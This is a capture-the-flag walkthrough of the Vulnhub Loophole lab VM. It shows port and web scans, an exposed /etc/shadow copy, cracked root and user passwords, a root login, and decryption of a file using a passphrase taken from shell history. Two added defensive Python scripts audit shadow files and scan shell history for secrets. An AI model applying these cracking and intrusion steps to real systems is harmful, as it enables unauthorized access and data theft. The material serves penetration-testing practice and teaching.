Vulnhub - Loophole VM
After configuring the network settings on each VM, we scan the network to detect the IP address of the 'server':
- the 'netdiscover' command lists the IP addresses discovered on the configured network. In our case the 'server' was at 10.8.7.2/29 and our Kali box at 10.8.7.4/29 (the first IP address available on the network).
Note: I had to create a VMnet3 network (under the Virtual Network Editor), assign it the network address 10.8.7.0/29, configure my VM workstation's IP address under VMnet3 and then run 'netdiscover'.
The 'server':
root@kali:~# nmap -sT -p- -T4 10.8.7.2
Nmap scan report for 10.8.7.2
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
113/tcp open ident
139/tcp open netbios-ssn
445/tcp open microsoft-ds
I also wanted to scan for UDP ports, so I ran the command above modified accordingly... but it was going to take forever, so I stopped it!
Checking what is running on port 80, we find email addresses on the site that give us some potential usernames to brute force: tskies@rattus.lab, jsummer@rattus.lab, mhog@rattus.lab.
Respectively:
tskies
jsummer
mhog
More testing of port 80 with nikto and dirbuster:
Nikto:
root@kali:~# nikto -h http://10.8.7.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.8.7.2
+ Target Hostname: 10.8.7.2
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/1.3.31 (Unix) PHP/4.4.4
+ Server leaks inodes via ETags, header found with file /, inode: 20914, size: 3001, mtime: Fri Feb 18 03:33:59 2011
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ PHP/4.4.4 appears to be outdated (current is at least 5.4.26)
+ Apache/1.3.31 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'CONNECT' may allow server to proxy client requests.
+ HTTP method: 'PATCH' may allow client to issue patch commands to server. See RFC-5789.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/4.4.4
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7355 requests: 0 error(s) and 22 item(s) reported on remote host
---------------------------------------------------------------------------
+ 1 host(s) tested
Dirbuster:
root@kali:~# dirb http://10.8.7.2
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://10.8.7.2/ ----
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37710)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)
+ http://10.8.7.2/~operator (CODE:403|SIZE:275)
+ http://10.8.7.2/~root (CODE:403|SIZE:271)
-----------------
DOWNLOADED: 4592 - FOUND: 9
Browsing the found directories, we stumble upon this:
http://10.8.7.2/garbage
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
Attempting to crack the MD5-crypt ($1$) hashes with online lookup services... no luck!
We will try john, the password cracker, with the famous rockyou.txt wordlist...
root@kali:~/Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt loophole
Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
nostradamus (tskies)
albatros (root)
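The file served at /garbage is a copy of /etc/shadow. As an added example that is not part of the original write-up, the following Python audits such a copy the way a hardening check would: it separates locked accounts from ones carrying a real hash, identifies the scheme from the modular-crypt prefix, and flags the legacy MD5-crypt ($1$) entries of the kind that fell to a wordlist above, without cracking anything. The shadow sample is the page's own file; the function names, the scheme table and the "weak" classification are this example's assumptions.

```python
# Added example (not from the original write-up): audit a leaked copy of
# /etc/shadow, such as the one served at /garbage, without cracking anything.
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional, Tuple

# The file exactly as the page shows it at http://10.8.7.2/garbage.
SAMPLE_SHADOW = """\
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
"""

# Modular-crypt prefixes as used by glibc/libxcrypt.
CRYPT_IDS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "7": "scrypt",
    "y": "yescrypt",
}

# Schemes a wordlist run gets through quickly: md5crypt is a fixed 1000-round
# MD5 loop with no cost parameter, descrypt truncates passwords to 8
# characters, and an empty field means no password at all.
WEAK_SCHEMES = {"md5crypt", "descrypt", "empty"}


@dataclass
class ShadowEntry:
    user: str
    scheme: str                 # "locked", "empty", "unknown", or a CRYPT_IDS name
    weak: bool
    last_change: Optional[int]  # field 3: days since 1970-01-01


def classify_hash(field: str) -> Tuple[str, bool]:
    """Return (scheme name, weak?) for the password field of one entry."""
    if field == "":
        return "empty", True
    if field[0] in "!*":          # "!!", "*" and "!$6$..." are locked accounts
        return "locked", False
    if field.startswith("$"):
        scheme = CRYPT_IDS.get(field.split("$")[1], "unknown")
        return scheme, scheme in WEAK_SCHEMES
    return "descrypt", True       # 13-character traditional DES crypt


def parse_shadow(text: str) -> List[ShadowEntry]:
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 3:       # blank or malformed line
            continue
        scheme, weak = classify_hash(fields[1])
        last = int(fields[2]) if fields[2].isdigit() else None
        entries.append(ShadowEntry(fields[0], scheme, weak, last))
    return entries


def weak_accounts(text: str) -> List[str]:
    """Usernames whose password should be rotated and re-hashed first."""
    return [e.user for e in parse_shadow(text) if e.weak]


def last_change_date(days: int) -> date:
    """Convert the shadow 'last change' field to a calendar date."""
    return date(1970, 1, 1) + timedelta(days=days)


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        when = last_change_date(e.last_change).isoformat() if e.last_change is not None else "?"
        print(f"{e.user:8} {e.scheme:12} weak={e.weak!s:5} last_change={when}")
```

Run it on a real backup copy with `parse_shadow(open(path).read())`. Accounts in the weak list are candidates for a forced password change after switching the system to sha512crypt or yescrypt (the `ENCRYPT_METHOD` setting in /etc/login.defs on shadow-utils systems), and a world-readable copy of the file under the web root is a finding in its own right.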
We try to log on as root, to see if it's possible... and it is! :)
We browse through the /home directories and find a .enc encrypted file.
Maybe the .bash_history file will provide us with some clues... and it does...
Below is the command that was used to encrypt the file:
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
We reverse the encryption with the same passphrase, to see if we can view the file:
openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
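The decryption only worked because the passphrase was sitting in .bash_history. As an added example that is not from the original write-up, this Python scans a shell history file for secrets passed on the command line: the `openssl -pass pass:` form seen above, plus a few other common shapes (openssl `-k`, mysql `-p`, curl `-u`, exported `*SECRET*` variables) to show the general case. The sample history is constructed for the example and only its first openssl line mirrors the page; the pattern labels and function names are this example's own.

```python
# Added example (not from the original write-up): find secrets that were
# typed on a command line and therefore survive in a shell history file,
# which is exactly how the passphrase above was recovered.
import re
from typing import List, Tuple

# Constructed sample history. Only the first openssl line mirrors the page;
# the other entries are made up to show the same problem in other tools.
SAMPLE_HISTORY = """\
ls -la /root
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
openssl enc -aes-256-cbc -d -in backup.enc -out backup.tar -k hunter2
mysql -u app -pS3cretDB appdb
curl -u deploy:tok3n https://example.invalid/api
export AWS_SECRET_ACCESS_KEY=AKIAEXAMPLESECRET
openssl enc -aes-256-cbc -e -pbkdf2 -in Private.doc -out Private.doc.enc -pass file:/root/.pw
"""

# (label, pattern); group 1 captures the secret so the report can mask it.
PATTERNS = [
    ("openssl -pass pass:",   re.compile(r"-pass\s+pass:(\S+)")),
    ("openssl -k",            re.compile(r"\bopenssl\b.*\s-k\s+(\S+)")),
    ("mysql -p<password>",    re.compile(r"\bmysql\b.*\s-p(\S+)")),
    ("curl -u user:password", re.compile(r"\bcurl\b.*\s(?:-u|--user)\s+\S+?:(\S+)")),
    ("exported secret",       re.compile(r"\bexport\s+\w*(?:SECRET|PASSWORD|TOKEN)\w*=(\S+)")),
]


def mask(secret: str) -> str:
    """Keep two characters so a finding can be matched, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_history(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, finding label, masked secret) for each matching line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append((lineno, label, mask(match.group(1))))
                break   # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for lineno, label, masked in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {label}: {masked}")
```

Secrets are masked in the report so the scan output does not become a second copy of the leak. For openssl enc specifically, `-pass file:`, `-pass env:` or `-pass stdin` keep the passphrase off the command line (and so out of history and the process list), and `-pbkdf2` with `-iter` replaces the legacy one-iteration key derivation that a bare `openssl enc` command like the one above relies on; the last sample line shows that form and is correctly not reported.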
And we download the Private.doc file to our Kali box:
root@kali:~/Desktop# scp root@10.8.7.2:/root/Private.doc /root/Desktop/
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
root@10.8.7.2's password:
Private.doc 100%
It seems to be some engineering documentation!
The end ....